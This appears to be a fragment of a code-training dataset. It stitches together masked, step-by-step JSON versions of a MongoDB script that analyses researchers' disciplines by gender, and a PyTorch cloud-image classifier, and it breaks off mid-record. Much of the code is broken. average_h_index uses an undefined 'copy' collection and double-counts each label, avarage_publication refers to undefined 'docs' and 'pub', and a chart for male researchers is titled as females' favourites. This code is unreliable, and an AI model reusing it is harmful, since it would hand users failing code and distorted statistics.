chart.bar(cumulative_arr, top_k, labels,\n 'Cumulative propotion of most popular disciplines', 'discipline',\n 'propotion', True, log=False, fontsize=100)\n chart.save(chart_path + '/cumulative_{0}'.format(top_k), format='eps')\n chart.clear()\n\n\ndef gender_favorite(top_k, sex='M'):\n docs = table.aggregate([{'$match': {'gender': sex}}, {'$unwind':\n '$labels'}, {'$group': {'_id': {'label': '$labels'}, 'count': {\n '$sum': 1}}}, {'$sort': {'count': -1}}])\n number_arr = []\n count_arr = []\n labels = []\n docs = [doc for doc in docs]\n for doc in docs[:top_k]:\n count_arr.append(doc['count'])\n labels.append(doc['_id']['label'])\n chart = Chart(100, 180)\n chart.bar(count_arr, top_k, labels,\n \"The Top {0} females' favorite disciplines\".format(top_k),\n 'discipline', 'researcher number', True, log=False, fontsize=120)\n chart.save(chart_path + '/{1}_favorite_{0}'.format(top_k, sex), format=\n 'eps')\n chart.clear()\n\n\ndef average_h_index(top_k):\n all_docs = copy.aggregate([{'$match': {'gender': {'$exists': True}}}, {\n '$project': {'index': 1, 'labels': 1, 'gender': 1, 'count': {\n '$size': '$pubs'}}}])\n d = {}\n col_d = {}\n for doc in all_docs:\n for label in doc['labels']:\n if label in d:\n if doc['gender'] == 'M':\n d[label][0] += 1\n d[label][1] += int(doc['index'])\n else:\n d[label][2] += 1\n d[label][3] += int(doc['index'])\n elif doc['gender'] == 'M':\n d[label] = [1, int(doc['index']), 0, 0]\n else:\n d[label] = [0, 0, 1, int(doc['index'])]\n if label in d:\n if doc['gender'] == 'M':\n d[label][0] += 1\n d[label][1] += int(doc['index'])\n else:\n d[label][2] += 1\n d[label][3] += int(doc['index'])\n elif doc['gender'] == 'M':\n d[label] = [1, int(doc['index']), 0, 0]\n else:\n d[label] = [0, 0, 1, int(doc['index'])]\n labels = []\n arr = []\n for key in d:\n if d[key][0] > 50:\n a = d[key][1] / d[key][0]\n b = d[key][3] / d[key][2]\n if b > a:\n print(key)\n print(a)\n print(b)\n\n\ndef avarage_publication(top_k):\n all_docs = copy.aggregate([{'$match': {'gender': {'$exists': True}}}, {\n '$project': {'labels': 1, 'gender': 1, 'count': {'$size': '$pubs'}}}])\n d = {}\n for doc in docs:\n for label in doc['labels']:\n if label in d:\n d[pub['label']] = d[pub['label']] + 1\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_discipline_with_more_female():\n docs = table.aggregate([{'$match': {'gender': {'$exists': 1}}}, {\n '$unwind': '$labels'}, {'$group': {'_id': {'label': '$labels',\n 'gender': '$gender'}, 'count': {'$sum': 1}}}])\n d = {}\n for doc in docs:\n if doc['_id']['label'] in d:\n if doc['_id']['gender'] == 'M':\n d[doc['_id']['label']][0] = doc['count']\n else:\n d[doc['_id']['label']][1] = doc['count']\n else:\n d[doc['_id']['label']] = [0, 0]\n if doc['_id']['gender'] == 'M':\n d[doc['_id']['label']][0] = doc['count']\n else:\n d[doc['_id']['label']][1] = doc['count']\n count = 0\n for key in d:\n if d[key][0] != 0 and d[key][1] > d[key][0]:\n count += 1\n print('%s:' % key)\n print('male {0},female {1}'.format(d[key][0], d[key][1]))\n print('number of all:%s' % count)\n\n\ndef discipline_proportion(top_k):\n docs = table.aggregate([{'$match': {'gender': {'$exists': 1}}}, {\n '$unwind': '$labels'}, {'$group': {'_id': {'label': '$labels'},\n 'count': {'$sum': 1}}}, {'$sort': {'count': -1}}])\n docs = [doc for doc in docs]\n total = table.count({'gender': {'$exists': 1}})\n count_arr = [doc['count'] for doc in docs[:top_k]]\n proportion_arr = [(doc['count'] / total) for doc in docs[:top_k]]\n cumulative_arr = []\n c = 0\n for i in proportion_arr:\n c += i\n cumulative_arr.append(c)\n labels = [doc['_id']['label'] for doc in docs[:top_k]]\n chart = Chart(100, 150)\n chart.bar(cumulative_arr, top_k, labels,\n 'Cumulative propotion of most popular disciplines', 'discipline',\n 'propotion', True, log=False, fontsize=100)\n chart.save(chart_path + '/cumulative_{0}'.format(top_k), format='eps')\n chart.clear()\n\n\ndef gender_favorite(top_k, sex='M'):\n docs = table.aggregate([{'$match': {'gender': sex}}, {'$unwind':\n '$labels'}, {'$group': {'_id': {'label': '$labels'}, 'count': {\n '$sum': 1}}}, {'$sort': {'count': -1}}])\n number_arr = []\n count_arr = []\n labels = []\n docs = [doc for doc in docs]\n for doc in docs[:top_k]:\n count_arr.append(doc['count'])\n labels.append(doc['_id']['label'])\n chart = Chart(100, 180)\n chart.bar(count_arr, top_k, labels,\n \"The Top {0} females' favorite disciplines\".format(top_k),\n 'discipline', 'researcher number', True, log=False, fontsize=120)\n chart.save(chart_path + '/{1}_favorite_{0}'.format(top_k, sex), format=\n 'eps')\n chart.clear()\n\n\ndef average_h_index(top_k):\n all_docs = copy.aggregate([{'$match': {'gender': {'$exists': True}}}, {\n '$project': {'index': 1, 'labels': 1, 'gender': 1, 'count': {\n '$size': '$pubs'}}}])\n d = {}\n col_d = {}\n for doc in all_docs:\n for label in doc['labels']:\n if label in d:\n if doc['gender'] == 'M':\n d[label][0] += 1\n d[label][1] += int(doc['index'])\n else:\n d[label][2] += 1\n d[label][3] += int(doc['index'])\n elif doc['gender'] == 'M':\n d[label] = [1, int(doc['index']), 0, 0]\n else:\n d[label] = [0, 0, 1, int(doc['index'])]\n if label in d:\n if doc['gender'] == 'M':\n d[label][0] += 1\n d[label][1] += int(doc['index'])\n else:\n d[label][2] += 1\n d[label][3] += int(doc['index'])\n elif doc['gender'] == 'M':\n d[label] = [1, int(doc['index']), 0, 0]\n else:\n d[label] = [0, 0, 1, int(doc['index'])]\n labels = []\n arr = []\n for key in d:\n if d[key][0] > 50:\n a = d[key][1] / d[key][0]\n b = d[key][3] / d[key][2]\n if b > a:\n print(key)\n print(a)\n print(b)\n\n\ndef avarage_publication(top_k):\n all_docs = copy.aggregate([{'$match': {'gender': {'$exists': True}}}, {\n '$project': {'labels': 1, 'gender': 1, 'count': {'$size': '$pubs'}}}])\n d = {}\n for doc in docs:\n for label in doc['labels']:\n if label in d:\n d[pub['label']] = d[pub['label']] + 1\n\n\ndiscipline_proportion(30)\n",
"step-3": "<mask token>\ntable = db.get_researcher_copy()\nchart_path = '../charts/discipline '\n\n\ndef get_discipline_with_more_female():\n docs = table.aggregate([{'$match': {'gender': {'$exists': 1}}}, {\n '$unwind': '$labels'}, {'$group': {'_id': {'label': '$labels',\n 'gender': '$gender'}, 'count': {'$sum': 1}}}])\n d = {}\n for doc in docs:\n if doc['_id']['label'] in d:\n if doc['_id']['gender'] == 'M':\n d[doc['_id']['label']][0] = doc['count']\n else:\n d[doc['_id']['label']][1] = doc['count']\n else:\n d[doc['_id']['label']] = [0, 0]\n if doc['_id']['gender'] == 'M':\n d[doc['_id']['label']][0] = doc['count']\n else:\n d[doc['_id']['label']][1] = doc['count']\n count = 0\n for key in d:\n if d[key][0] != 0 and d[key][1] > d[key][0]:\n count += 1\n print('%s:' % key)\n print('male {0},female {1}'.format(d[key][0], d[key][1]))\n print('number of all:%s' % count)\n\n\ndef discipline_proportion(top_k):\n docs = table.aggregate([{'$match': {'gender': {'$exists': 1}}}, {\n '$unwind': '$labels'}, {'$group': {'_id': {'label': '$labels'},\n 'count': {'$sum': 1}}}, {'$sort': {'count': -1}}])\n docs = [doc for doc in docs]\n total = table.count({'gender': {'$exists': 1}})\n count_arr = [doc['count'] for doc in docs[:top_k]]\n proportion_arr = [(doc['count'] / total) for doc in docs[:top_k]]\n cumulative_arr = []\n c = 0\n for i in proportion_arr:\n c += i\n cumulative_arr.append(c)\n labels = [doc['_id']['label'] for doc in docs[:top_k]]\n chart = Chart(100, 150)\n chart.bar(cumulative_arr, top_k, labels,\n 'Cumulative propotion of most popular disciplines', 'discipline',\n 'propotion', True, log=False, fontsize=100)\n chart.save(chart_path + '/cumulative_{0}'.format(top_k), format='eps')\n chart.clear()\n\n\ndef gender_favorite(top_k, sex='M'):\n docs = table.aggregate([{'$match': {'gender': sex}}, {'$unwind':\n '$labels'}, {'$group': {'_id': {'label': '$labels'}, 'count': {\n '$sum': 1}}}, {'$sort': {'count': -1}}])\n number_arr = []\n count_arr = []\n labels = []\n docs = [doc for doc in docs]\n for doc in docs[:top_k]:\n count_arr.append(doc['count'])\n labels.append(doc['_id']['label'])\n chart = Chart(100, 180)\n chart.bar(count_arr, top_k, labels,\n \"The Top {0} females' favorite disciplines\".format(top_k),\n 'discipline', 'researcher number', True, log=False, fontsize=120)\n chart.save(chart_path + '/{1}_favorite_{0}'.format(top_k, sex), format=\n 'eps')\n chart.clear()\n\n\ndef average_h_index(top_k):\n all_docs = copy.aggregate([{'$match': {'gender': {'$exists': True}}}, {\n '$project': {'index': 1, 'labels': 1, 'gender': 1, 'count': {\n '$size': '$pubs'}}}])\n d = {}\n col_d = {}\n for doc in all_docs:\n for label in doc['labels']:\n if label in d:\n if doc['gender'] == 'M':\n d[label][0] += 1\n d[label][1] += int(doc['index'])\n else:\n d[label][2] += 1\n d[label][3] += int(doc['index'])\n elif doc['gender'] == 'M':\n d[label] = [1, int(doc['index']), 0, 0]\n else:\n d[label] = [0, 0, 1, int(doc['index'])]\n if label in d:\n if doc['gender'] == 'M':\n d[label][0] += 1\n d[label][1] += int(doc['index'])\n else:\n d[label][2] += 1\n d[label][3] += int(doc['index'])\n elif doc['gender'] == 'M':\n d[label] = [1, int(doc['index']), 0, 0]\n else:\n d[label] = [0, 0, 1, int(doc['index'])]\n labels = []\n arr = []\n for key in d:\n if d[key][0] > 50:\n a = d[key][1] / d[key][0]\n b = d[key][3] / d[key][2]\n if b > a:\n print(key)\n print(a)\n print(b)\n\n\ndef avarage_publication(top_k):\n all_docs = copy.aggregate([{'$match': {'gender': {'$exists': True}}}, {\n '$project': {'labels': 1, 'gender': 1, 'count': {'$size': '$pubs'}}}])\n d = {}\n for doc in docs:\n for label in doc['labels']:\n if label in d:\n d[pub['label']] = d[pub['label']] + 1\n\n\ndiscipline_proportion(30)\n",
"step-4": "import DB as db\nimport os\nfrom Chart import Chart\nimport matplotlib.pyplot as plt\nimport numpy as np\ntable = db.get_researcher_copy()\nchart_path = '../charts/discipline '\n\n\ndef get_discipline_with_more_female():\n docs = table.aggregate([{'$match': {'gender': {'$exists': 1}}}, {\n '$unwind': '$labels'}, {'$group': {'_id': {'label': '$labels',\n 'gender': '$gender'}, 'count': {'$sum': 1}}}])\n d = {}\n for doc in docs:\n if doc['_id']['label'] in d:\n if doc['_id']['gender'] == 'M':\n d[doc['_id']['label']][0] = doc['count']\n else:\n d[doc['_id']['label']][1] = doc['count']\n else:\n d[doc['_id']['label']] = [0, 0]\n if doc['_id']['gender'] == 'M':\n d[doc['_id']['label']][0] = doc['count']\n else:\n d[doc['_id']['label']][1] = doc['count']\n count = 0\n for key in d:\n if d[key][0] != 0 and d[key][1] > d[key][0]:\n count += 1\n print('%s:' % key)\n print('male {0},female {1}'.format(d[key][0], d[key][1]))\n print('number of all:%s' % count)\n\n\ndef discipline_proportion(top_k):\n docs = table.aggregate([{'$match': {'gender': {'$exists': 1}}}, {\n '$unwind': '$labels'}, {'$group': {'_id': {'label': '$labels'},\n 'count': {'$sum': 1}}}, {'$sort': {'count': -1}}])\n docs = [doc for doc in docs]\n total = table.count({'gender': {'$exists': 1}})\n count_arr = [doc['count'] for doc in docs[:top_k]]\n proportion_arr = [(doc['count'] / total) for doc in docs[:top_k]]\n cumulative_arr = []\n c = 0\n for i in proportion_arr:\n c += i\n cumulative_arr.append(c)\n labels = [doc['_id']['label'] for doc in docs[:top_k]]\n chart = Chart(100, 150)\n chart.bar(cumulative_arr, top_k, labels,\n 'Cumulative propotion of most popular disciplines', 'discipline',\n 'propotion', True, log=False, fontsize=100)\n chart.save(chart_path + '/cumulative_{0}'.format(top_k), format='eps')\n chart.clear()\n\n\ndef gender_favorite(top_k, sex='M'):\n docs = table.aggregate([{'$match': {'gender': sex}}, {'$unwind':\n '$labels'}, {'$group': {'_id': {'label': '$labels'}, 'count': {\n '$sum': 1}}}, {'$sort': {'count': -1}}])\n number_arr = []\n count_arr = []\n labels = []\n docs = [doc for doc in docs]\n for doc in docs[:top_k]:\n count_arr.append(doc['count'])\n labels.append(doc['_id']['label'])\n chart = Chart(100, 180)\n chart.bar(count_arr, top_k, labels,\n \"The Top {0} females' favorite disciplines\".format(top_k),\n 'discipline', 'researcher number', True, log=False, fontsize=120)\n chart.save(chart_path + '/{1}_favorite_{0}'.format(top_k, sex), format=\n 'eps')\n chart.clear()\n\n\ndef average_h_index(top_k):\n all_docs = copy.aggregate([{'$match': {'gender': {'$exists': True}}}, {\n '$project': {'index': 1, 'labels': 1, 'gender': 1, 'count': {\n '$size': '$pubs'}}}])\n d = {}\n col_d = {}\n for doc in all_docs:\n for label in doc['labels']:\n if label in d:\n if doc['gender'] == 'M':\n d[label][0] += 1\n d[label][1] += int(doc['index'])\n else:\n d[label][2] += 1\n d[label][3] += int(doc['index'])\n elif doc['gender'] == 'M':\n d[label] = [1, int(doc['index']), 0, 0]\n else:\n d[label] = [0, 0, 1, int(doc['index'])]\n if label in d:\n if doc['gender'] == 'M':\n d[label][0] += 1\n d[label][1] += int(doc['index'])\n else:\n d[label][2] += 1\n d[label][3] += int(doc['index'])\n elif doc['gender'] == 'M':\n d[label] = [1, int(doc['index']), 0, 0]\n else:\n d[label] = [0, 0, 1, int(doc['index'])]\n labels = []\n arr = []\n for key in d:\n if d[key][0] > 50:\n a = d[key][1] / d[key][0]\n b = d[key][3] / d[key][2]\n if b > a:\n print(key)\n print(a)\n print(b)\n\n\ndef avarage_publication(top_k):\n all_docs = copy.aggregate([{'$match': {'gender': {'$exists': True}}}, {\n '$project': {'labels': 1, 'gender': 1, 'count': {'$size': '$pubs'}}}])\n d = {}\n for doc in docs:\n for label in doc['labels']:\n if label in d:\n d[pub['label']] = d[pub['label']] + 1\n\n\ndiscipline_proportion(30)\n",
"step-5": "import DB as db\nimport os\nfrom Chart import Chart\nimport matplotlib.pyplot as plt\nimport numpy as np\ntable = db.get_researcher_copy()\nchart_path = '../charts/discipline '\n\n\ndef get_discipline_with_more_female():\n\tdocs = table.aggregate([\n\t\t{'$match':{'gender':{'$exists':1}}},\n\t\t{'$unwind':'$labels'},\n\t\t{'$group':{'_id':{'label':'$labels','gender':'$gender'},'count':{'$sum':1}}}\n\t\t# {'$group':{'_id':{'label':'$labels'},'male_count':{'$sum':{'$match':{'gender':'M'}}}}}\n\t\t])\n\td = {}\n\tfor doc in docs:\n\t\tif doc['_id']['label'] in d:\n\t\t\tif doc['_id']['gender'] == 'M':\n\t\t\t\td[doc['_id']['label']][0] = doc['count']\n\t\t\telse:\n\t\t\t\td[doc['_id']['label']][1] = doc['count']\n\t\telse:\n\t\t\td[doc['_id']['label']] = [0,0]\n\t\t\tif doc['_id']['gender'] == 'M':\n\t\t\t\td[doc['_id']['label']][0] = doc['count']\n\t\t\telse:\n\t\t\t\td[doc['_id']['label']][1] = doc['count']\n\n\tcount = 0\n\tfor key in d:\n\t\tif d[key][0]!=0 and d[key][1] > d[key][0]:\n\t\t\tcount+=1\n\t\t\tprint('%s:'%key)\n\t\t\tprint('male {0},female {1}'.format(d[key][0],d[key][1]))\n\tprint('number of all:%s'%count)\n\n\n\ndef discipline_proportion(top_k):\n\tdocs = table.aggregate([\n\t\t{'$match':{'gender':{'$exists':1}}},\n\t\t{'$unwind':'$labels'},\n\t\t{'$group':{\n\t\t'_id':{'label':'$labels'},\n\t\t'count':{'$sum':1}\n\t\t}},\n\t\t{'$sort':{'count':-1}}])\n\n\tdocs = [doc for doc in docs]\n\t# print(docs[:10])\n\ttotal = table.count({'gender':{'$exists':1}})\n\tcount_arr = [doc['count'] for doc in docs[:top_k]]\n\tproportion_arr = [doc['count']/total for doc in docs[:top_k]]\n\n\tcumulative_arr = []\n\tc = 0\n\tfor i in proportion_arr:\n\t\tc+=i\n\t\tcumulative_arr.append(c)\n\n\tlabels = [doc['_id']['label'] for doc in docs[:top_k]]\n\n\t# chart = Chart()\n\t# print(len(labels))\n\t# print(len(arr))\n\t# chart.pie([arr],'test',labels)\n\t# chart.show()\n\t# chart.single_unnomarlized_CDF(arr,'disciplines CDF','disciplines','percentage')\n\t# chart.save(chart_path+'cdf.eps')\n\n\t# s = ''\n\t# print(np.median())\n\t# for label in labels:\n\t# \ts = s+label+', '\n\t# print(s)\n\n\t# os.mkdir(chart_path) if not os.path.exists(chart_path) else ''\n\tchart = Chart(100,150)\n\t# chart.bar(count_arr,top_k,labels,'The Top {0} popular disciplines'.format(top_k),'discipline','researcher number',True,log=False,fontsize=100)\n\t# chart.show()\n\t# chart.save(chart_path+'/number_{0}'.format(top_k),format='eps')\n\t# chart.clear()\n\n\tchart.bar(cumulative_arr,top_k,labels,'Cumulative propotion of most popular disciplines','discipline','propotion',True,log=False,fontsize=100)\n\tchart.save(chart_path+'/cumulative_{0}'.format(top_k),format='eps')\n\tchart.clear()\n\n\t# chart = Chart(100,150)\n\t# chart.bar(proportion_arr,top_k,labels,'The propotion of researchers in top 30 disciplines','discipline','propotion',True,log=False,fontsize=100)\n\t# chart.save(chart_path+'/proportion_{0}.eps'.format(top_k))\n\t# chart.clear()\n\t\ndef gender_favorite(top_k,sex='M'):\n\tdocs = table.aggregate([\n\t\t{'$match':{'gender':sex}},\n\t\t{'$unwind':'$labels'},\n\t\t{'$group':{\n\t\t'_id':{'label':'$labels'},\n\t\t'count':{'$sum':1}\n\t\t}},\n\t\t{'$sort':{'count':-1}}])\n\tnumber_arr = []\n\tcount_arr = []\n\tlabels = []\n\tdocs = [doc for doc in docs]\n\tfor doc in docs[:top_k]:\n\t\tcount_arr.append(doc['count'])\n\t\tlabels.append(doc['_id']['label'])\n\n\tchart = Chart(100,180)\n\tchart.bar(count_arr,top_k,labels,\"The Top {0} females' favorite disciplines\".format(top_k),'discipline','researcher number',True,log=False,fontsize=120)\n\tchart.save(chart_path+'/{1}_favorite_{0}'.format(top_k,sex),format='eps')\n\tchart.clear()\n\ndef average_h_index(top_k):\n\tall_docs = copy.aggregate([{'$match':{'gender':{'$exists':True}}},{'$project':{'index':1,'labels':1,'gender':1,'count':{'$size':'$pubs'}}}])\n\td = {}\n\tcol_d = {}\n\tfor doc in all_docs:\n\t\tfor label in doc['labels']:\n\t\t\tif label in d:\n\t\t\t\tif doc['gender'] == 'M':\n\t\t\t\t\td[label][0]+=1\n\t\t\t\t\td[label][1]+=int(doc['index'])\n\t\t\t\telse:\n\t\t\t\t\td[label][2]+=1\n\t\t\t\t\td[label][3]+=int(doc['index'])\n\t\t\telse:\n\t\t\t\tif doc['gender'] == 'M':\n\t\t\t\t\td[label] = [1,int(doc['index']),0,0]\n\t\t\t\telse:\n\t\t\t\t\td[label] = [0,0,1,int(doc['index'])]\n\t\t\t\t\t\n\t\t\tif label in d:\n\t\t\t\tif doc['gender'] == 'M':\n\t\t\t\t\td[label][0]+=1\n\t\t\t\t\td[label][1]+=int(doc['index'])\n\t\t\t\telse:\n\t\t\t\t\td[label][2]+=1\n\t\t\t\t\td[label][3]+=int(doc['index'])\n\t\t\telse:\n\t\t\t\tif doc['gender'] == 'M':\n\t\t\t\t\td[label] = [1,int(doc['index']),0,0]\n\t\t\t\telse:\n\t\t\t\t\td[label] = [0,0,1,int(doc['index'])]\t\n\n\tlabels = []\n\tarr = []\n\n\tfor key in d:\n\t\tif d[key][0] > 50:\n\t\t\ta = d[key][1]/d[key][0]\n\t\t\tb = d[key][3]/d[key][2]\n\t\t\tif b>a:\n\t\t\t\tprint(key)\n\t\t\t\tprint(a)\n\t\t\t\tprint(b)\n\ndef avarage_publication(top_k):\n\tall_docs = copy.aggregate([{'$match':{'gender':{'$exists':True}}},{'$project':{'labels':1,'gender':1,'count':{'$size':'$pubs'}}}])\t\n\td = {}\n\tfor doc in docs:\n\t\tfor label in doc['labels']:\n\t\t\tif label in d:\n\t\t\t\td[pub['label']] = d[pub['label']]+1\n\n\n\n\n\n\n# \tarr.sort(key=lambda x:x[2],reverse=True)\n# \tarr = arr[:top_k]\n# \taverage_index_arr = []\n# \tlabels = []\n# \tfor item in arr:\n# \t\tlabels.append(item[0])\n# \t\taverage_index_arr.append(item[1])\n\n# \tchart = Chart(100,180)\n# \tchart.bar(average_index_arr,top_k,labels,'The Top {0} fields with highest average h-index'.format(top_k),'discipline','researcher number',True,log=False,fontsize=120)\n# \tchart.save(chart_path+'/top_{0}_average_disciplines'.format(top_k),format='png')\n# \tchart.clear()\t\n\n\ndiscipline_proportion(30)\n# get_discipline_with_more_female()\n# gender_favorite(30)\n# gender_favorite(30,'F')\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import cv2
import imageio
import pandas as pd
import glob, os
import numpy as np
fileDir = os.getcwd()
# os.chdir("./train-jpg")
# there are 40480 training examples
# we will allocate 39000 for training
# and the remaining 1480 will be for validation
input_size = 65536 # 256^2
hidden_size = 20
hidden_size_1 = 15
hidden_size_2 = 10
hidden_size_3 = 5
num_classes = 1
learning_rate = 0.001
num_epochs = 5
train_num = 1000
test_num = 148
# train_num = 39000
# test_num = 1480
# %% Load data--for clouds and non-clouds
images = []
for file in glob.glob("*.jpg"):
images.append(file)
images = sorted(images, key=lambda filename: int(filename[6: -4])) # string splicing so that the images are in order
train_images = []
test_images = []
train_labels = []
test_labels = []
labels = pd.read_csv("./train_v2.csv") # labels are whether or not image is any sort of cloudy or haze
for i in range(train_num + test_num):
tags = labels.iloc[i]["tags"]
if i < train_num:
train_images.append(imageio.imread(images[i], as_gray=True).flatten())
train_labels.append(int("cloudy" not in tags and "haze" not in tags))
# train_labels.append(int("water" not in tags))
else:
test_images.append(imageio.imread(images[i], as_gray=True).flatten())
test_labels.append(int("cloudy" not in tags and "haze" not in tags))
# test_labels.append(int("water" not in tags))
class Net(nn.Module):
def __init__(self, input_size, hidden_size, num_classes):
super(Net, self).__init__()
# parameters
# weights
# self.h1 = nn.Sigmoid() # input_size, hidden_size
# self.o = nn.Sigmoid() # hidden_size, num_classes
self.h1 = nn.Linear(input_size, hidden_size)
self.h2 = nn.Linear(hidden_size, hidden_size_1)
self.h3 = nn.Linear(hidden_size_1, hidden_size_2)
self.h4 = nn.Linear(hidden_size_2, hidden_size_3)
self.o = nn.Linear(hidden_size_3, num_classes)
def forward(self, x):
x = torch.sigmoid(self.h1(x))
# print("doing x: {}".format(x.shape))
x = torch.sigmoid(self.h2(x))
x = torch.sigmoid(self.h3(x))
x = torch.sigmoid(self.h4(x))
x = torch.sigmoid(self.o(x))
return x
# %%
model = Net(input_size, hidden_size, num_classes) # no device configuration here
criterion = nn.SoftMarginLoss()
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
# model = TheModelClass(*args, **kwargs)
# model.load_state_dict(torch.load("model.ckpt"))
# model.eval()
# optimizer = TheOptimizerClass(*args, **kwargs)
# checkpoint = torch.load('./model.ckpt')
# model.load_state_dict(checkpoint['model_state_dict'])
# optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
# epoch = checkpoint['epoch']
# loss = checkpoint['loss']
total_step = len(train_images)
for epoch in range(num_epochs):
for i, image in enumerate(train_images):
image = torch.Tensor(train_images[i]).reshape(1, 65536)
label = torch.Tensor([int(train_labels[i])])
# label = label.long()
# label = label.reshape(1,1)
# label = label.squeeze()
# Forward pass
outputs = model(image)
outputs = outputs.squeeze(0)
# outputs.reshape(1,)
loss = criterion(outputs, label)
# Backward and optimize
optimizer.zero_grad()
loss.backward()
optimizer.step()
if (i+1) % 100 == 0:
print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'
.format(epoch+1, num_epochs, i+1, total_step, loss.item()))
# %%
with torch.no_grad():
correct = 0
total = 0
for i, image in enumerate(test_images):
image = torch.Tensor(test_images[i]).reshape(1, 65536)
label = torch.Tensor([int(test_labels[i])])
outputs = model(image)
outputs = outputs.squeeze(0)
outputs = 1 if torch.sum(outputs) >= 0.5 else 0
if outputs == torch.sum(label):
correct += 1
elif outputs == 0:
print("#############")
print(i,outputs, torch.sum(label))
# _, predicted = torch.max(outputs.data, 1)
# correct += (predicted == labels).sum().item()
print('Accuracy of the network on the {} test images: {} %'.format(len(test_images), 100 * correct / len(test_images)))
# %%
torch.save(model.state_dict(), 'model.ckpt')
# %%
|
normal
|
{
"blob_id": "a4deb67d277538e61c32381da0fe4886016dae33",
"index": 85,
"step-1": "<mask token>\n\n\nclass Net(nn.Module):\n\n def __init__(self, input_size, hidden_size, num_classes):\n super(Net, self).__init__()\n self.h1 = nn.Linear(input_size, hidden_size)\n self.h2 = nn.Linear(hidden_size, hidden_size_1)\n self.h3 = nn.Linear(hidden_size_1, hidden_size_2)\n self.h4 = nn.Linear(hidden_size_2, hidden_size_3)\n self.o = nn.Linear(hidden_size_3, num_classes)\n\n def forward(self, x):\n x = torch.sigmoid(self.h1(x))\n x = torch.sigmoid(self.h2(x))\n x = torch.sigmoid(self.h3(x))\n x = torch.sigmoid(self.h4(x))\n x = torch.sigmoid(self.o(x))\n return x\n\n\n<mask token>\n",
"step-2": "<mask token>\nfor file in glob.glob('*.jpg'):\n images.append(file)\n<mask token>\nfor i in range(train_num + test_num):\n tags = labels.iloc[i]['tags']\n if i < train_num:\n train_images.append(imageio.imread(images[i], as_gray=True).flatten())\n train_labels.append(int('cloudy' not in tags and 'haze' not in tags))\n else:\n test_images.append(imageio.imread(images[i], as_gray=True).flatten())\n test_labels.append(int('cloudy' not in tags and 'haze' not in tags))\n\n\nclass Net(nn.Module):\n\n def __init__(self, input_size, hidden_size, num_classes):\n super(Net, self).__init__()\n self.h1 = nn.Linear(input_size, hidden_size)\n self.h2 = nn.Linear(hidden_size, hidden_size_1)\n self.h3 = nn.Linear(hidden_size_1, hidden_size_2)\n self.h4 = nn.Linear(hidden_size_2, hidden_size_3)\n self.o = nn.Linear(hidden_size_3, num_classes)\n\n def forward(self, x):\n x = torch.sigmoid(self.h1(x))\n x = torch.sigmoid(self.h2(x))\n x = torch.sigmoid(self.h3(x))\n x = torch.sigmoid(self.h4(x))\n x = torch.sigmoid(self.o(x))\n return x\n\n\n<mask token>\nfor epoch in range(num_epochs):\n for i, image in enumerate(train_images):\n image = torch.Tensor(train_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(train_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n loss = criterion(outputs, label)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if (i + 1) % 100 == 0:\n print('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'.format(epoch +\n 1, num_epochs, i + 1, total_step, loss.item()))\nwith torch.no_grad():\n correct = 0\n total = 0\n for i, image in enumerate(test_images):\n image = torch.Tensor(test_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(test_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n outputs = 1 if torch.sum(outputs) >= 0.5 else 0\n if outputs == torch.sum(label):\n correct += 1\n elif outputs == 0:\n print('#############')\n print(i, outputs, torch.sum(label))\n print('Accuracy of the network on the {} test images: {} %'.format(len(\n test_images), 100 * correct / len(test_images)))\ntorch.save(model.state_dict(), 'model.ckpt')\n",
"step-3": "<mask token>\nfileDir = os.getcwd()\ninput_size = 65536\nhidden_size = 20\nhidden_size_1 = 15\nhidden_size_2 = 10\nhidden_size_3 = 5\nnum_classes = 1\nlearning_rate = 0.001\nnum_epochs = 5\ntrain_num = 1000\ntest_num = 148\nimages = []\nfor file in glob.glob('*.jpg'):\n images.append(file)\nimages = sorted(images, key=lambda filename: int(filename[6:-4]))\ntrain_images = []\ntest_images = []\ntrain_labels = []\ntest_labels = []\nlabels = pd.read_csv('./train_v2.csv')\nfor i in range(train_num + test_num):\n tags = labels.iloc[i]['tags']\n if i < train_num:\n train_images.append(imageio.imread(images[i], as_gray=True).flatten())\n train_labels.append(int('cloudy' not in tags and 'haze' not in tags))\n else:\n test_images.append(imageio.imread(images[i], as_gray=True).flatten())\n test_labels.append(int('cloudy' not in tags and 'haze' not in tags))\n\n\nclass Net(nn.Module):\n\n def __init__(self, input_size, hidden_size, num_classes):\n super(Net, self).__init__()\n self.h1 = nn.Linear(input_size, hidden_size)\n self.h2 = nn.Linear(hidden_size, hidden_size_1)\n self.h3 = nn.Linear(hidden_size_1, hidden_size_2)\n self.h4 = nn.Linear(hidden_size_2, hidden_size_3)\n self.o = nn.Linear(hidden_size_3, num_classes)\n\n def forward(self, x):\n x = torch.sigmoid(self.h1(x))\n x = torch.sigmoid(self.h2(x))\n x = torch.sigmoid(self.h3(x))\n x = torch.sigmoid(self.h4(x))\n x = torch.sigmoid(self.o(x))\n return x\n\n\nmodel = Net(input_size, hidden_size, num_classes)\ncriterion = nn.SoftMarginLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\ntotal_step = len(train_images)\nfor epoch in range(num_epochs):\n for i, image in enumerate(train_images):\n image = torch.Tensor(train_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(train_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n loss = criterion(outputs, label)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if (i + 1) % 100 == 0:\n print('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'.format(epoch +\n 1, num_epochs, i + 1, total_step, loss.item()))\nwith torch.no_grad():\n correct = 0\n total = 0\n for i, image in enumerate(test_images):\n image = torch.Tensor(test_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(test_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n outputs = 1 if torch.sum(outputs) >= 0.5 else 0\n if outputs == torch.sum(label):\n correct += 1\n elif outputs == 0:\n print('#############')\n print(i, outputs, torch.sum(label))\n 